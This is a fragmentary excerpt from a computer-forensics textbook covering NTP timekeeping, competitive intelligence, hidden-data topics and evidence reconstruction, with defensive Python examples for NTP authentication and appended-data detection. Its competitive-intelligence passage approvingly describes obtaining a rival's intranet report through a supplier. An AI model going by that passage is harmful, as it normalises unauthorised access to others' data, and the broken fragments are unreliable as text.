The executive, disgruntled because of his demotion, was later terminated; it was subsequently determined that the executive
had planned to quit about the same time he was fired and establish a competitive
company
...
Suspicious that critical information
had been taken, the company’s attorneys sent the computers to a CFST for examination
...
The drives were previewed less than an hour after management
determined that the investigation was necessary and that time was of the essence
...
What occurred during that analysis?
Optional Team Case Project
A large government agency, through a CFST, was able to enable a rapid incident response and capture sensitive data in a timely manner [3]
...
, The Essential Guide to Storage Area Networks, Prentice Hall,
New York, 2002
...
, 2075 NE Division St
...
[3] “EEE in Action: Real-World Scenarios” (Copyright 2004 Guidance Software, Inc., 215 N. ..., 2nd Floor, Pasadena, CA 91101, 2004)
...
The Internet gives computer users access to a wealth of information
...
International boundaries no longer exist when it comes to the
exchange of information over the Internet
...
However, the Internet also provides the crooks with communication capabilities that did
not exist previously
...
It is sad but very true
...
More and more, law enforcement agencies are encountering computers at
crime scenes
...
Internet-related crimes are clearly on the rise,
and abuses of corporate and government Internet accounts by employees are becoming commonplace
...
He was using his corporate Internet account, on company time,
to run his side business
...
To make matters worse, he was also using the corporate computers on company
time to view and download pornographic images from the Internet
...
Just recently, law enforcement officials in Herndon, Virginia, requested help in the investigation of the rape of a young girl
...
When the rapist was finally caught, his computer contained crucial evidence
in the case
...
Funding is finally being focused on the creation of
local and state computer crime units
...
Some of these training efforts are directed at Internet-related crimes, and more
training emphasis will be placed on this important technology issue in the future
...
In other
words, being able to investigate incidents that involve multiple computers is much
easier when the timestamps on files (identified data) and in logs are in sync
...
With NTP, you can synchronize against truly accurate time sources
such as the atomic clocks run by the National Institute of Standards and Technology (NIST), the U.S. Naval Observatory, or counterparts in other countries around
the world
...
This protocol is capable of synchronizing
distributed clocks within milliseconds over long periods of time
...
The reference implementation of NTP, developed by David Mills’s group at the University of Delaware, was distributed as
xntp (the NTP version 3 package); the version 4 distribution is simply called ntp, and its daemon is ntpd
...
rs
...
umich
...
tar
...
You may also find binary distributions there
...
tar
...
4h-sunos4
...
Z)
...
Identification of Data
What does accurate timekeeping have to do with computer forensics? Keeping
a consistent sense of time is critical for many computer-forensic-related activities
...
Many
authentication systems, Kerberos being the most prominent example, use dated
tickets to control access to systems and resources
...
NTP began as a tool that permitted researchers to synchronize workstation
clocks to within milliseconds or better
...
Newer versions of NTP
fixed the problem by providing a model for automatic configuration and key exchange
...
Time Matters
Why bother having accurate clocks? Isn’t the one that comes in your desktop PC or
your enterprise server adequate? The answer is that accurate timekeeping is an advanced science, an avocation practiced by hundreds of scientists around the world,
and the paltry clock chip you have in your PC or expensive server winds up being
a bit less accurate than your Swatch® watch for several reasons
...
Not all quartz
crystals are the same to begin with, but put one inside a nice, hot computer that’s
cool whenever it’s turned off, and the crystal’s frequency tends to wander
...
Delays in processing these interrupts cause Unix system clocks to lose time—
slowly, but erratically
...
Over time, scientists and programmers have developed different techniques
for synchronizing clocks over TCP/IP or other network protocols
...
Though these
remain available Internet standards, neither is currently sufficient for accurate
timekeeping, and, hence, both are considered out-of-date
...
There
are modem-based programs that contact NIST timeservers and fetch a time message (along with an estimate of round-trip time to account for latency), which you
can still use today
...
The University of Delaware site (http://www
...
udel
...
html) includes
lists of stratum-one servers in the United States; you can also find stratum-one
servers through Web search engines
...
Below stratum-one servers are many stratum-two servers; stratum-three
servers are below that, and so on
...
To improve each server’s notion of time, servers in the same stratum may peer (that is, act
as equals) and perform the same timestamp exchanges done by NTP clients
...
This was NTP’s only security provision for a while
...
NTP guards against
this in several ways
...
Also, if a system has been using
NTP, the NTP software assumes that changes in a local clock will be small, generally less than a second (ntpd slews offsets below its 128 ms step threshold, steps the clock for larger ones, and by default refuses to correct an offset beyond 1000 s at all, logging a panic message and exiting instead)
...
NTP goes beyond this by collecting timestamps from many servers (and peers,
if appropriate)
...
For example, the outliers in the sample (the timestamps with the largest divergence from the rest) are discarded
...
On Unix systems, a special system call, adjtime (),
makes small adjustments to system time
...
You can modify the configuration of ntpd to label a timeserver as untrusted
...
By the late 1980s, version 2 had been released
...
NTP uses User Datagram Protocol (UDP) packets (on port 123), which are easy to spoof because of their stateless nature (no connection setup, as in TCP)
...
The most interesting aspects of version 4 are the security improvements
...
When a client contacts an NTP server, the client can collect a
certificate that contains the server’s public key and independently verify it (the Autokey scheme)
...
The key ids are used with session keys to perform a quick
authentication check based on a keyed Message Digest 5 (MD5) hash; this is a message authentication code computed over the shared key and the packet, not a digital signature, so it proves only that the sender knew the key
...
Public
key encryption algorithms aren’t only slow (compared to symmetric, secret-key algorithms
such as RC4), they’re also inconsistent in that the amount of time used to encrypt
may vary by a factor of two—something very unpleasant for those obsessed with
keeping accurate time
...
Version 4 also supports the Diffie-Hellman key exchange for peers, so that
peers can agree on shared session keys without ever sending them over the network
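The four-timestamp exchange, the outlier discard and the symmetric-key MD5 authentication described above, as an added example; this is not code from the book, from xntp or from ntpd. It builds and parses the 48-byte NTP header as RFC 5905 lays it out, computes offset and delay from the four timestamps, drops outliers across several servers, and checks the key id plus MD5(key || packet) MAC that symmetric-key mode appends (a keyed digest, not a signature). The clock values, the shared secret and the key id are constructed for the demonstration; the public-key Autokey scheme is not implemented.

```python
"""NTP client-side helpers (RFC 5905 wire format): header build/parse,
offset and delay from the four timestamps, outlier rejection across
servers, and the symmetric-key MD5 MAC check.

Added example for this page; not code from the book, xntp or ntpd.
All packets and clock values are constructed in memory (no network I/O).
"""
import hashlib
import hmac
import struct

NTP_EPOCH_OFFSET = 2208988800          # seconds from 1900-01-01 to 1970-01-01
HEADER = "!BBBbIIIQQQQ"                 # 48-byte NTP header, network byte order
HEADER_LEN = struct.calcsize(HEADER)   # 48
MAC_LEN = 4 + 16                       # key id + MD5 digest
MODE_CLIENT, MODE_SERVER = 3, 4


def to_ntp(unix_seconds):
    """Unix time (float) -> 64-bit NTP timestamp (32-bit seconds, 32-bit fraction)."""
    secs, frac = divmod(unix_seconds + NTP_EPOCH_OFFSET, 1)
    return (int(secs) << 32) | int(frac * (1 << 32))


def from_ntp(ts):
    """64-bit NTP timestamp -> Unix time (float)."""
    return (ts >> 32) - NTP_EPOCH_OFFSET + (ts & 0xFFFFFFFF) / (1 << 32)


def ntp_add(ts, seconds):
    """Advance an NTP timestamp by a number of seconds using exact integer math."""
    return ts + round(seconds * (1 << 32))


def build_packet(mode, stratum, ref_id, ref_ts, orig_ts, recv_ts, xmit_ts, version=4):
    """Pack an NTP header: LI=0, poll=6 (64 s), precision=-20 (about 1 us)."""
    li_vn_mode = (0 << 6) | (version << 3) | mode
    return struct.pack(HEADER, li_vn_mode, stratum, 6, -20, 0, 0,
                       ref_id, ref_ts, orig_ts, recv_ts, xmit_ts)


def parse_packet(pkt):
    """Unpack the header fields a client needs; any trailing MAC is ignored here."""
    f = struct.unpack(HEADER, pkt[:HEADER_LEN])
    return {"li": f[0] >> 6, "version": (f[0] >> 3) & 7, "mode": f[0] & 7,
            "stratum": f[1], "ref_id": f[6], "ref_ts": f[7],
            "orig_ts": f[8], "recv_ts": f[9], "xmit_ts": f[10]}


def offset_and_delay(t1, t2, t3, t4):
    """t1 client send, t2 server receive, t3 server send, t4 client receive.
    All NTP integers; returns (offset, delay) in seconds, offset = server - client."""
    offset = ((t2 - t1) + (t3 - t4)) / 2
    delay = (t4 - t1) - (t3 - t2)          # round trip minus server processing
    return offset / (1 << 32), delay / (1 << 32)


def select_offset(offsets, max_divergence=0.128):
    """Drop samples far from the median (the outliers) and average the rest.
    Returns (estimate, number_discarded); a simplification of ntpd's selection."""
    ordered = sorted(offsets)
    n = len(ordered)
    median = ordered[n // 2] if n % 2 else (ordered[n // 2 - 1] + ordered[n // 2]) / 2
    kept = [o for o in ordered if abs(o - median) <= max_divergence]
    return sum(kept) / len(kept), n - len(kept)


def append_mac(pkt, key_id, key):
    """Symmetric-key authentication: 4-byte key id + MD5(key || header)."""
    return pkt + struct.pack("!I", key_id) + hashlib.md5(key + pkt).digest()


def verify_mac(pkt, keys):
    """Return (authenticated, key_id); `keys` maps trusted key ids to secrets."""
    if len(pkt) != HEADER_LEN + MAC_LEN:
        return False, None
    body = pkt[:HEADER_LEN]
    key_id = struct.unpack("!I", pkt[HEADER_LEN:HEADER_LEN + 4])[0]
    key = keys.get(key_id)
    if key is None:                        # unknown or untrusted key id
        return False, key_id
    expected = hashlib.md5(key + body).digest()
    return hmac.compare_digest(expected, pkt[HEADER_LEN + 4:]), key_id


# Constructed exchange (not captured traffic): the client clock is the
# reference, the server clock runs 0.5 s fast, one-way delay is 10 ms.
KEYS = {1: b"constructed-shared-secret"}   # hypothetical ntp.keys entry
T1 = to_ntp(1700000000.0)                   # client send
T2 = ntp_add(T1, 0.510)                     # server receive: 10 ms + 0.5 s offset
T3 = ntp_add(T1, 0.512)                     # server send: 2 ms processing
T4 = ntp_add(T1, 0.022)                     # client receive, client clock again


def demo():
    reply = build_packet(MODE_SERVER, 2, 0x0A000001, ntp_add(T1, -60), T1, T2, T3)
    reply = append_mac(reply, 1, KEYS[1])
    ok, key_id = verify_mac(reply, KEYS)
    hdr = parse_packet(reply)
    offset, delay = offset_and_delay(hdr["orig_ts"], hdr["recv_ts"], hdr["xmit_ts"], T4)
    return {"authenticated": ok, "key_id": key_id, "stratum": hdr["stratum"],
            "offset": offset, "delay": delay}


if __name__ == "__main__":
    print(demo())
```

The MAC check is deliberately length-strict: a 48-byte reply with no MAC fails closed, and a reply with an unknown key id is rejected before any hashing, which is the equivalent of the `trustedkey` list in ntpd.conf. Offsets are worked in 2^-32 second integer units and converted to float only at the end, so the large 1900-epoch seconds never erode the sub-millisecond fraction.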
...
FORENSIC IDENTIFICATION AND ANALYSIS
OF TECHNICAL SURVEILLANCE DEVICES
It was one sentence among hundreds in a transcription of a dull congressional hearing
on the environment, a statement anyone might have missed: Bristol-Myers Squibb Co
...
However, the
competitive intelligence (CI) officer at arch rival SmithKline Beecham Corp
...
The intelligence officer sprang into action
...
But why was Bristol-Myers suddenly seeking to cut down 200 times
as many yews? Was it ready to put its planned anticancer drug, Taxol, into production? Back at SmithKline headquarters in Philadelphia, the news was enough to
trigger serious nail-biting in the boardroom
...
Would
it beat Bristol-Myers’ drug to market? Or would SmithKline Beecham have to speed
up its production schedule—and if so, by how much?
The intelligence officer’s team wasted no time
...
It tapped into Web sources
on the environment and got staffers to work the phones, gathering names of researchers working for Bristol-Myers
...
Sure enough, Bristol-Myers had been taking out recruitment ads in those areas’
newspapers for cancer researchers—a sure sign that Bristol-Myers was stepping up
its hiring of oncologists specializing in breast cancer
...
That was all the intelligence officer needed to hear
...
The CIA, the National Security Agency, and
England’s MI5 used a form of CI to figure out what the Russians were doing
...
SmithKline Beecham’s tale of how competitive intelligence saved a company
millions is no longer unusual
...
The number of large corporations with CI units has quadrupled since 1997, and spending on
CI is estimated to be around $32 billion annually—nearly double the amount spent
just two years ago
...
As far back as the 1970s, in a now-famous example of excess zeal, The Boeing Company discovered that a Russian delegation
visiting one of its manufacturing plants was wearing crepe-soled shoes that would
surreptitiously pick up metal shavings off the factory floor to determine the type of
exotic metal alloys Boeing was using in its planes
...
, the former
chief of CI used to work for the CIA
...
In a May 2003 survey by marketing firm TR Cutler, Inc
...
trcutler
...
S
...
Corporate Information
Now, here’s a real secret: until recently, most corporate gumshoeing was being outsourced to spy companies with 007-sounding names such as WarRoom Research Inc
...
Now, though, corporate
snooping is increasingly being conducted in-house—and for the first time, chief information officers (CIOs) are being forced to the frontlines
...
And why not? Information
is about technology, and information is increasingly a company’s competitive edge
...
This is now a double-edged sword
...
Case in point: The CIO of 3COM Corp
...
3com
...
html/),
makers of Internet switches and hubs, now supplies employees with two toll-free
numbers: one to report any intrusions into corporate secrets, the other to report
what 3COM’s rivals are up to
...
What is CI? Everything from illegal spying and theft of trade secrets to classic
intelligence-gathering—whatever it takes to provide executives with a systematic
way to collect and analyze public information about rivals and use it to guide strategy
...
Its goal: to anticipate, with
razor-sharp accuracy and speed, a rival’s next move, plot new opportunities, and
help avert disasters
...
Indeed, some companies, from Burger
King to Lucent Technologies Inc
...
For example, in 2002, Wal-Mart Stores Inc
...
Gathered by electronic scanners in checkout aisles, the data had been
closely monitored by various parties—from the companies that make products
sold in Wal-Mart’s more than 4,800 stores to Wall Street analysts
...
NutraSweet
estimates its intelligence unit is worth at least $70 million a year in sales gained or
revenues not lost
...
All information is now being thrown into the digital hopper and sliced and diced for
clues and leaks
...
What is the real bottom line? The new business-led push to get better competitive data (faster) is also defining new opportunities for CIO leadership at most
firms
...
Those responsible for business intelligence
activities will really be clued in; companies who have CIOs with competitive leadership abilities, will have the competitive edge in the years ahead
...
Most
existing systems and organizations are still ill-equipped to keep pace with the ever-growing amount of information available
...
The result is
that the key to carving out the leading edge of the knowledge gap in one’s industry
(the difference between what you know and what your rival knows) lies in the ability to build IT systems that can scope out the movements of corporate rivals in real
time
...
Players unable to surmount
their bureaucratic inertia will find their existence threatened
...
Therefore, it is recommended that you now start recruiting the technology executives who can build systems that will give your company the ability to react in
real time to what its rivals are doing
...
The goal is to tie technology and business together in a common pursuit of becoming more competitive and responsive
to rivals and customers in the marketplace
...
Companies are now installing radar in the corporate cockpit, and that’s
where the CIO comes in
...
The Net is opening up whole new ways to snoop, giving companies access
to material that used to take months or years and millions of dollars to unearth,
from satellite photos of rival plant sites, to the inside skinny on a rival CEO’s off-work activities
...
For example, the London-based consumer products
firm Unilever plc was looking to go into China with a new product, but Dollens and
Associates’ (Chicago-based) chief technology officer (CTO), by going on the Web,
discovered that Procter & Gamble was developing a similar product
...
How did Unilever get wind of P&G’s plans? The CTO found P&G’s new product report on P&G’s own
corporate intranet—access to which Unilever was able to get through the CTO and
a common supplier
...
It takes far more than watching Web sites to get smart about CI
...
Shell’s CI office provides the CIO with benchmarks on competitors, and the CIO then develops customized search software to help the CI
team sift through files
...
It’s a mix of technology and people
...
Most CIOs are still far more likely to shop for technology than actively participate in CI tag teams and strategy sessions, but increasingly, companies like P&G
are realizing they cannot move forward on CI without asking CIOs to help tag and
distribute priority data to the people inside the company who most need to know
...
Recently, that happened to
a large telecom equipment maker with 30,000 home pages on its supply-chain intranet
...
This was a situation where the CIO
could have taken charge and made sure the information was in one spot
...
CI teams
should spend one-third of their time gathering information on a project, one-third
in analysis, and one-third discussing their findings
...
CIOs can step in and devise ways to improve the ability of executives to focus on information that really matters to them,
with filters that take out the junk nobody needs to be looking at
...
Often the
best competitive information does not appear as highly structured data, such as financial information
...
Once the best data is tagged for collection, who gets access to it? If you search
for data involving a two-in-one laundry soap and fabric softener, what terms do
you classify, and what do you let everyone see? CIOs can help companies figure out
how to tag, gather, store, and distribute a wide range of competitive data with differing levels of access and indexing—and with standards that are consistent
throughout the company, domestically and abroad
...
They haven’t marked documents as confidential, and nobody beyond a
certain level knows what specifically they’re looking for
...
With a proliferation of business relationships these days (joint
ventures, supply-chain collaborations, and so forth) you really need to do an information audit to make sure you know what you have and what you need
...
People who understand the
concept of organizing information and indexing it could be paired with someone
who understands different technology capabilities, such as a relational database
showing connections between different terms or items
...
However, don’t get carried away on the technology
...
None of them were able to take companies
through the process of data identification, discovery, distribution, and analysis
...
The thinking machine
has not yet arrived
...
CIOs need to help build that
...
Still not convinced? CIOs confident that their rivals’ intranet data is too safe to
even try prying open should take a ride (fly or drive) down Virginia’s Dulles Corridor, a throughway outside Washington, DC that is lined with high-tech firms
...
You can actually pick up one wireless network after another (hot
spots), including the networks of a major credit clearinghouse and Department of
Defense contractors that store classified data on their servers
...
Imagine the kind of damage a terrorist organization could do
...
Recent surveys have revealed that 80%
of these hot spots are not protected by firewalls, encryption, or intrusion detection
systems
...
For example, when Oracle Corp
...
, it didn’t use even a byte of cyber sleuthing
...
In other words, in this business, you need to be aggressive
...
Always recall the words of ancient Chinese general Sun Tzu (6th–5th century B.C.):
“Be so subtle that you are invisible, be so mysterious that you are intangible; then
you will control your rival’s fate
...
Many times the computer evidence
was created transparently by the computer’s operating system and without the
knowledge of the computer operator
...
It is this
information that benefits law enforcement and military agencies in intelligence
gathering and in the conduct of investigations
...
Such computer forensic software tools
and methods can also be used to identify backdated files and to tie a floppy diskette
to a specific computer
...
It is possible to hide diskettes within diskettes and to
hide entire computer hard disk drive partitions
...
The need for timely and unequivocal
identification of attackers is essential for such an approach to be effective
...
In addition, there may be some
complicating factors for the implementation of the type of identification and forensics capability discussed in this chapter, such as the widespread move to encryption
...
Conclusions
The hiding of data in computer graphic files (steganography)
Detection of steganography and watermarks
Steganography jamming techniques and theory
Data written to “extra” tracks
Data written to “extra” sectors
Data written to hidden partitions
Data stored as unallocated space
Massive amounts of data written to file slack areas
Data hidden by diffusion into binary objects, Windows swap, and Windows
page files
Hidden disks within disks
Floppy diskette data storage anomaly detection
Data scrubbing of ambient data storage areas
...
Data scrubbing of entire storage devices using methods that meet current Department of Defense security requirements
The potential risk of shadow data issues
The appending of data to program files, graphics files, and compressed data
files—simple and very effective
Electronic eavesdropping techniques, threats, risks, and remedies
Covert capture of keystrokes via hardware and radio interception
Tempest issues regarding the remote capture of computer screen images
Electronic eavesdropping techniques concerning cellular telephones
Electronic eavesdropping techniques concerning personal pagers
Search methodologies for use in the identification of foreign language phrases
in binary form stored on computer media
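Several items in the list above (data appended to graphics and compressed files, hidden data in "extra" space) come down to one examiner's question: does the file contain bytes beyond the point where its format says it ends? The following check is an added example, not code from the book or its CD-ROM. It walks a PNG's chunk list to the IEND chunk and a JPEG's marker segments to the EOI marker, and reports anything after that point. The sample images are constructed inline; the function and file names are this example's own.

```python
"""Check whether a PNG or JPEG carries bytes appended after its logical end.

Added example, not code from the book. A PNG's last chunk is IEND and a
JPEG's last marker is EOI (FF D9); bytes after that are not part of the
picture and deserve a closer look. Sample images are constructed below.
"""
import struct
import zlib
from typing import Optional

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def png_logical_end(data: bytes) -> Optional[int]:
    """Offset just past the IEND chunk, or None if not a well-formed PNG."""
    if not data.startswith(PNG_SIG):
        return None
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        chunk_end = pos + 8 + length + 4          # length, type, payload, CRC
        if chunk_end > len(data):
            return None                            # truncated chunk
        if ctype == b"IEND":
            return chunk_end
        pos = chunk_end
    return None


def jpeg_logical_end(data: bytes) -> Optional[int]:
    """Offset just past EOI, found by walking marker segments rather than
    searching for FF D9: an EXIF thumbnail in APP1 has its own EOI."""
    if not data.startswith(b"\xff\xd8"):
        return None
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            return None                            # lost sync: not a marker
        marker = data[pos + 1]
        if marker == 0xD9:                         # EOI
            return pos + 2
        if marker == 0xFF:                         # fill byte
            pos += 1
            continue
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:   # TEM / RSTn carry no length
            pos += 2
            continue
        if pos + 4 > len(data):
            return None
        seglen = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        pos += 2 + seglen                          # length field counts itself
        if marker == 0xDA:                         # SOS: skip entropy-coded data
            while pos + 1 < len(data) and not (
                data[pos] == 0xFF
                and data[pos + 1] != 0x00              # FF 00 is a stuffed byte
                and not 0xD0 <= data[pos + 1] <= 0xD7  # RSTn sits inside the scan
            ):
                pos += 1
    return None


def trailing_data(data: bytes) -> Optional[bytes]:
    """Bytes after the logical end (b'' if clean); None if not PNG/JPEG."""
    end = png_logical_end(data)
    if end is None:
        end = jpeg_logical_end(data)
    return None if end is None else data[end:]


# --- constructed sample images (not real evidence) ---------------------------
def _png_chunk(ctype: bytes, payload: bytes) -> bytes:
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def make_minimal_png() -> bytes:
    """A valid 1x1 8-bit grayscale PNG."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")              # filter byte + one pixel
    return (PNG_SIG + _png_chunk(b"IHDR", ihdr)
            + _png_chunk(b"IDAT", idat) + _png_chunk(b"IEND", b""))


def make_jpeg_with_thumbnail() -> bytes:
    """JPEG skeleton whose APP1 segment embeds a tiny SOI+EOI 'thumbnail'.
    Not a decodable picture, but the marker structure is what the walker needs."""
    app1_payload = b"Exif\x00\x00" + b"\xff\xd8\xff\xd9"
    app1 = b"\xff\xe1" + struct.pack(">H", 2 + len(app1_payload)) + app1_payload
    sos = b"\xff\xda" + struct.pack(">H", 3) + b"\x01"
    entropy = b"\x12\xff\x00\x34\xff\xd0\x56"       # stuffed FF and an RST0 marker
    return b"\xff\xd8" + app1 + sos + entropy + b"\xff\xd9"


if __name__ == "__main__":
    for name, blob in [("clean.png", make_minimal_png()),
                       ("stuffed.png", make_minimal_png() + b"hidden text"),
                       ("thumb.jpg", make_jpeg_with_thumbnail() + b"\x00more")]:
        print(f"{name}: {len(trailing_data(blob))} trailing byte(s)")
```

A file with trailing bytes is not proof of concealment (some tools pad or append metadata), but it is a concrete lead that the appended region should be carved out, hashed, and typed separately.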
An Agenda for Action
When completing the Identification of Data Checklist (Table F10
...
The order is not significant; however, these are the
activities for which the researcher would want to provide a detailed description of
procedures, review, and assessment for ease of use and admissibility
...
Finally, let’s move on to the real interactive part of this chapter: review questions and exercises, hands-on projects, case projects, and optional team case project
...
CHAPTER REVIEW QUESTIONS AND EXERCISES
True/False
1
...
2
...
3
...
4
...
5
...
Multiple Choice
1
...
A
...
National White Collar Crime Center
C
...
International Association of Computer Investigation Specialists
E
...
The NTP software includes drivers for a large number of devices, except for two
of the following that do not serve as references for stratum-one servers:
A
...
Land lines
C
...
Global positioning system (GPS) receivers
E
...
The CI’s goal is to do, with razor-sharp accuracy and speed, the following,
except for two:
A
...
Plot new opportunities
C
...
Help cause disasters
E
...
Which one of the following do financial organizations rely on for the accuracy
of their transactions?
A
...
File fragments
C
...
D
...
Erased files
5
...
NTP
B
...
DOS
D
...
WEP
Exercise
A CFS team (CFST) arrived at a company site to collect computer evidence from a
server
...
What did the CFST do to collect key evidence to
solve this problem?
HANDS-ON PROJECTS
The CTO of a large beverage company suspected something was amiss when he
noticed a significant amount of traffic traveling through the company network
...
A CFST
was contracted to perform a confidential after-hours investigation of the network
and the system administrators [4]
...
The goal of the investigation was to determine if the chief financial officer had
ordered his staff to alter or destroy transactions to help the company’s financial position appear more favorable [5]
...
The subject got into the network
and placed several large media files on several computers and changed the desktop
configurations
...
The IT department called and the CFST consulted on the case
[5]
...
, 126 Charles Street, Cambridge, MA 02141, 2002
...
, Wireless Broadband Networks Handbook: 3G, LMDS and
Wireless Internet, McGraw-Hill Professional, New York, 2001
...
, The Essential Guide to Storage Area Networks, Prentice Hall,
New York, 2002
...
, Guidance Software, Inc
...
Marengo
Ave
...
[5] Mandall, Robert, Computer, Forensic Evidence Solutions, Inc
...
) 1212 Hope Ranch Lane, Las
Vegas, NV, 2002
...
A combination of hardware and
software tools has been developed using commercial off-the-shelf utilities integrated with newly developed programs
...
Processes have been developed to
recover hidden, erased, and password-protected data
...
Because there is a wide variety of computers, peripherals, and software available, including many different forms of archival storage (Zip, Jaz, disk, tape, CDROM, etc
...
Recovered data must be analyzed, and a coherent file must be reconstructed using advanced search programs specifically developed for this work
...
Case files going back over five years were cleared with the
information obtained
...
In the case of a murdered model, the
murderer’s computer address book was recovered and is now being used to determine if he might be a serial killer
...
The primary goal of this chapter is to illustrate how to reconstruct past events
with as little distortion or bias as possible
...
Anyone who has seen a slaying on
a police show can probably give a reasonably good account of the initial steps in an
investigation
...
Next, comes recording the area via photographs and note taking
...
HOW TO BECOME A DIGITAL DETECTIVE
Recovering electronic data is only the beginning
...
In other words, how do you reconstruct past
events to ensure that your findings will be admissible as evidence in your case?
What follows are some recommendations for accomplishing that goal
...
,” you may not
know what to do with the disk
...
Help may be just down the hall
...
They might not understand what you mean by a discovery request, but they may be able to help you convert the contents of the disk to
a form you can look at
...
They may have the tools you need to look at and start working with the data
you just received
...
In addition, your client may have the resources you need
...
If you are
using a litigation support vendor, that organization may be able to bring skills to
bear
...
Convert Digital Evidence
Before you can reconstruct past events and present the data, you need it on a
medium and in a format you can work with
...
Today, data can come
on a variety of media, such as holograms, video, data tapes, Zip disks, CD-ROM
disks, and even 3
...
If you receive electronic evidence on an 8-mm data tape, chances are that you
will not have an 8-mm tape drive at your desk
...
Reconstructing Past Events
305
You need to get the data onto a medium your computer can read, which these days generally means a 3
...
How do you do this?
For example, you could use Zip disks
...
The cost of Iomega
Zip drives (http://www
...
com/global/index
...
CDs are even simpler,
as CD drives have become commonplace on PCs
...
5-inch disks
generally pose no problem
...
At
times this is not an issue
...
The formats most
likely to be useable without conversion are word processing files (principally WordPerfect and Word files), spreadsheet files (principally Excel and Lotus), and presentation files (principally PowerPoint files)
...
The format may be too new
...
In a similar vein, you may have to get the data converted if it comes to you in a format that
is too old or runs on a different operating system
...
UNUSABLE FILE FORMATS
You may get electronic data in a format that you cannot use “out of the box
...
You may have already encountered these issues
with a variety of files including email files, database files from mainframe systems,
and “
...
Anyone who has undertaken this task can attest that it is potentially a difficult and painstaking process
...
Initially, try to get as much information about
how the files were created and maintained as you can
...
For example, if you receive a “
...
Furthermore, get sample printouts if possible
...
They may show how the
data was laid out—and, hence, how it was used
...
CONVERTING FILES
If you are going to attempt converting the data yourself, you may be fortunate
enough to have received electronic data that you can convert directly into programs
such as Access or Excel using the wizards built into those programs
...
txt” files
...
If that information is not in the file, then try to get the field names and descriptions from the producing party
...
Sometimes data will not be in a format amenable to immediate conversion
...
Get the Right Software, Hardware, and Personnel
Concomitant with getting the data into a useable format is getting the right software, hardware, and personnel to work with the format you choose
...
mario
...
net/concordance/) meet most of your needs, but there are, of course,
a plethora of other good tools available
...
Hardware requirements will vary greatly depending on specific circumstances
...
A hundred gigabytes of data still pose very few problems
...
When faced with data of that quantity, you need to set up dedicated machines that do not pass queries or
results across your network
...
If you are going to make
sense of the electronic data you have received, converted, and loaded, you need to
know how to use the tools yourself, or, failing that, rely on someone who can use
the tools for you
...
Also, once
you are in a position to work with the electronic data you got from outside resources, check that the data is what it ought to be
...
Prepare an
inventory of what you received and compare it against what you requested
...
More likely, however, it will require that you develop short descriptions of the data you received and
then match the descriptions with your discovery requests
...
You also can search the electronic data for references to electronic files that
should have been given to you but were not
...
The manual review can be enhanced if the software you are using to review
the data allows you to search for strings of characters
...
Examples include .htm, .htx, .mcw, .wps, and
...
.csv, .dif, .wk1, .wk4, .wq1, .xlw for spreadsheet files; and .csv, .dbf, .html, .mdb, .mdw, .txt, and
...
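The inventory comparison described above (what you received versus what the received files themselves refer to) can be scripted. What follows is an added example, not the book's code: it searches each received file for names carrying the extensions listed in the text, then reports any referenced name that is absent from the inventory, together with the file that mentioned it. It reads each file both as narrow text and as UTF-16, because Office-style binaries store many of their strings that way. The produced "files" are constructed stand-ins, and the function names are this example's own.

```python
"""Cross-check received files for references to files that were not produced.

Added example, not the book's code. Searches each received file for names
ending in the extensions the chapter lists and reports names missing from
the inventory. Sample files are constructed inline.
"""
import re
from typing import Dict, Iterator, List, Set

# Extensions the chapter names for word processing, spreadsheet and database files.
EXTENSIONS = ["htm", "htx", "mcw", "wps", "csv", "dif", "wk1", "wk4", "wq1",
              "xlw", "dbf", "html", "mdb", "mdw", "txt"]

# Bare file names such as budget.xlw; longer extensions first so a prefix
# such as htm does not shadow html.
_EXT_ALT = "|".join(sorted(EXTENSIONS, key=len, reverse=True))
FILENAME_RE = re.compile(r"\b[\w\-]+\.(?:" + _EXT_ALT + r")\b", re.IGNORECASE)


def _texts(data: bytes) -> Iterator[str]:
    """The bytes as narrow text and as UTF-16LE at both alignments."""
    yield data.decode("latin-1")
    yield data.decode("utf-16-le", errors="ignore")
    yield data[1:].decode("utf-16-le", errors="ignore")


def extract_references(data: bytes) -> Set[str]:
    """Lower-cased file names mentioned anywhere in the data."""
    return {m.group(0).lower()
            for text in _texts(data) for m in FILENAME_RE.finditer(text)}


def missing_references(received: Dict[str, bytes]) -> Dict[str, List[str]]:
    """Referenced-but-not-received name -> received files that mention it."""
    have = {name.lower() for name in received}
    missing: Dict[str, List[str]] = {}
    for name, data in received.items():
        for ref in sorted(extract_references(data)):
            if ref not in have:
                missing.setdefault(ref, []).append(name)
    return missing


def constructed_production() -> Dict[str, bytes]:
    """Constructed stand-in for a set of produced files (not real evidence)."""
    return {
        "memo.txt": b"Figures are in C:\\data\\budget.xlw; customers exported to sales.dbf.",
        "sales.dbf": b"\x03\x66\x01\x01" + b"\x00" * 28,          # header bytes only
        # 13 bytes of binary prefix, so the UTF-16 string sits at an odd offset
        "report.doc": b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 5
                      + "Linked table: Q2_figures.mdb".encode("utf-16-le"),
    }


if __name__ == "__main__":
    for ref, mentioned_in in missing_references(constructed_production()).items():
        print(f"{ref}: referenced by {', '.join(mentioned_in)} but not received")
```

The output is a list of follow-up requests to put to the producing party, with the mentioning file as the justification for each.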
If you received spreadsheet or database files in their native format, you can
scrutinize them for signs of links to files that were used in connection with the files
you got but that were not given to you
...
It also can mean checking the “properties
...
In a
database file such as an Access file, this means closely examining all tables, queries,
forms, reports, macros, and modules for references to other files
...
If you go to File | Properties, you can sometimes find this information
...
You should go to File |
Properties, where you may be able to find out a host of details about the file that the
people sending it to you may never have known went with it
...
In word processing files, look for comments that display on the screen, but do
not automatically print out
...
If there are objects embedded in the word processing file, such as portions of spreadsheet files, try to ascertain the names of source files
...
Check the formula for references to other files
...
If the column listing across the top
reads “A B C E H,” that means there are at least three hidden columns (D, F, and
G) that might contain information of greater value than anything shown
...
Beware of cells that appear to be empty but are not
...
Look for
links to files you did not receive; in Access, this might be indicated by small arrows
to the left of the table icons
...
In tables, look for hidden fields
...
